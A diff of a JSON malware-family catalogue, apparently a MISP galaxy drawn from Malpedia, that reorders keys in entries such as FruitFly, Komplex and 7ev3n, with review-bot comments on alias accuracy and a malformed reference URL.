@@ -2055,94 +2055,92 @@ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" - ] + ], + "synonyms": [ + "Quimitchin" + ], + "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", - "value": "FruitFly", - "description": "" + "value": "FruitFly" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", - "value": "HiddenLotus", - "description": "" + "value": "HiddenLotus" }, { + "description": "", "meta": { - "synonyms": [ - "Revir" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" - ] + ], + "synonyms": [ + "Revir" + ], + "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", - "value": "iMuler", - "description": "" + "value": "iMuler" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", - 
"value": "KeRanger", - "description": "" + "value": "KeRanger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "" + "value": "Keydnap" }, { + "description": "", "meta": { - "synonyms": [ - "KitM" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" - ] + ], + "synonyms": [ + "KitM" + ], + "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", - "value": "Kitmos", - "description": "" + "value": "Kitmos" }, { + "description": "", "meta": { - "synonyms": [ - "SedUploader", - "JHUHUGIT", - "JKEYSKW" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", 
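Review bot: The Komplex entry's synonyms moved on the new side, `"SedUploader"`, `"JHUHUGIT"`, `"JKEYSKW"`, are names that other sources apply to the Windows first-stage tooling of the same actor rather than to the macOS Komplex sample, so listing them as aliases here could conflate two families in any lookup that keys on synonyms; this is inferred from the names alone and is worth confirming against the Malpedia page cited in `refs` before leaving them in place. If they are kept, a short description on the entry (it is currently `"description": ""`) explaining the relationship would prevent the confusion. The Komplex `refs` list continues into the hunk at 2150.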
@@ -2150,211 +2148,213 @@ "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf" - ] + ], + "synonyms": [ + "SedUploader", + "JHUHUGIT", + "JKEYSKW" + ], + "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "" + "value": "Komplex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", - "value": "Laoshu", - "description": "" + "value": "Laoshu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", - "value": "Leverage", - "description": "" + "value": "Leverage" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "" + "value": "MacDownloader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", 
"https://objective-see.com/blog/blog_0x16.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", - "value": "MacInstaller", - "description": "" + "value": "MacInstaller" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service", "https://objective-see.com/blog/blog_0x1E.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", - "value": "MacRansom", - "description": "" + "value": "MacRansom" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "" + "value": "MacSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", - "value": "MacVX", - "description": "" + "value": "MacVX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", - "value": "MaMi", - "description": "" + "value": "MaMi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://objective-see.com/blog/blog_0x16.html", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" - ] + ], + 
"synonyms": [], + "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" + "value": "Mokes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "" + "value": "Mughthesec" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "" + "value": "OceanLotus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "" + "value": "Olyx" }, { + "description": "", "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] + ], + "synonyms": [ + "Findzip" + ], + "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": 
"Patcher", - "description": "" + "value": "Patcher" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "" + "value": "Pirrit" }, { + "description": "", "meta": { - "synonyms": [ - "Calisto" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", 
@@ -2366,319 +2366,321 @@
 "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/",
 "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/",
 "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf"
- ]
+ ],
+ "synonyms": [
+ "Calisto"
+ ],
+ "type": []
 },
 "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44",
- "value": "Proton RAT",
- "description": ""
+ "value": "Proton RAT"
 },
 {
+ "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet",
 "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb",
- "value": "Pwnet",
- "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack."
+ "value": "Pwnet"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Retefe"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe",
 "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/",
 "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same",
 "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/",
 "https://www.govcert.admin.ch/blog/33/the-retefe-saga"
- ]
+ ],
+ "synonyms": [
+ "Retefe"
+ ],
+ "type": []
 },
 "uuid": "80acc956-d418-42e3-bddf-078695a01289",
- "value": "Dok",
- "description": ""
+ "value": "Dok"
 },
 {
+ "description": "General purpose backdoor",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd",
 "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a",
- "value": "systemd",
- "description": "General purpose backdoor"
+ "value": "systemd"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos",
 "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/",
 "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c",
- "value": "Uroburos",
- "description": ""
+ "value": "Uroburos"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti",
 " https://401trg.pw/an-update-on-winnti/",
 "https://401trg.pw/winnti-evolution-going-open-source/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
- "value": "Winnti",
- "description": ""
+ "value": "Winnti"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker",
 "https://objective-see.com/blog/blog_0x16.html",
 "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5",
- "value": "WireLurker",
- "description": ""
+ "value": "WireLurker"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet",
 "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html",
 "https://news.drweb.com/show/?i=2679&lng=en&c=14"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e",
- "value": "Wirenet",
- "description": ""
+ "value": "Wirenet"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent",
 "https://twitter.com/PhysicalDrive0/status/845009226388918273",
 "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf",
 "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf",
- "value": "X-Agent",
- "description": ""
+ "value": "X-Agent"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd",
 "https://objective-see.com/blog/blog_0x16.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
- "value": "XSLCmd",
- "description": ""
+ "value": "XSLCmd"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas",
 "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity",
 "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7",
- "value": "PAS",
- "description": ""
+ "value": "PAS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Webshell by Orb"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso",
 "https://github.com/wso-shell",
 "https://securelist.com/energetic-bear-crouching-yeti/85345/"
- ]
+ ],
+ "synonyms": [
+ "Webshell by Orb"
+ ],
+ "type": []
 },
 "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7",
- "value": "WSO",
- "description": ""
+ "value": "WSO"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos",
 "https://www.group-ib.com/resources/threat-research/silence.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90",
- "value": "Silence DDoS",
- "description": ""
+ "value": "Silence DDoS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater",
 "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3",
- "value": "BONDUPDATER",
- "description": ""
+ "value": "BONDUPDATER"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer",
 "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0db05333-2214-49c3-b469-927788932aaa",
- "value": "GhostMiner",
- "description": ""
+ "value": "GhostMiner"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy",
"https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "" + "value": "POSHSPY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "" + "value": "PowerWare" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "" + "value": "POWRUNER" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", - "value": "QUADAGENT", - "description": "" + "value": "QUADAGENT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", - "value": "RogueRobin", - 
"description": "" + "value": "RogueRobin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "" + "value": "Tater PrivEsc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "" + "value": "ThunderShell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "" + "value": "WMImplant" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", 
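Review bot: The Winnti entry's second ref, `" https://401trg.pw/an-update-on-winnti/"`, carries a leading space inside the string, so any consumer that validates or dereferences `refs` will reject or mis-resolve it; the hunk carries it through unchanged as context. Since this commit already rewrites every `meta` block, dropping the space to `"https://401trg.pw/an-update-on-winnti/"` belongs in the same pass. Separately, this hunk (and the later ones at 2689, 2754, 2902 and 2951) re-emits `"description": ""` and `"type": []` on every entry that has no value; if the galaxy schema permits omitting those keys, an absent key states "unknown" more plainly than an empty-string or empty-array sentinel, so that policy is worth confirming before the reorder lands.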
@@ -2689,60 +2691,57 @@ "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", - "value": "BrickerBot", - "description": "" + "value": "BrickerBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "" + "value": "Saphyra" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. 
It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" + "value": "7ev3n" }, { + "description": "", "meta": { - "synonyms": [ - "Hydraq", - "McRAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", 
@@ -2754,126 +2753,126 @@ "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" - ] + ], + "synonyms": [ + "Hydraq", + "McRAT" + ], + "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "" + "value": "9002 RAT" }, { + "description": "", "meta": { - "synonyms": [ - "PinkKite" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" - ] + ], + "synonyms": [ + "PinkKite" + ], + "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", - "value": "AbaddonPOS", - "description": "" + "value": "AbaddonPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", - "value": "Abbath Banker", - "description": "" + "value": "Abbath Banker" }, { + "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. 
It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", - "value": "AcridRain", - "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." + "value": "AcridRain" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "" + "value": "Acronym" }, { + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://twitter.com/JaromirHorejsi/status/813712587997249536", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." 
+ "value": "AdamLocker"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob",
 "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf",
- "value": "win.adkoob",
- "description": ""
+ "value": "win.adkoob"
 },
 {
+ "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot",
 "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
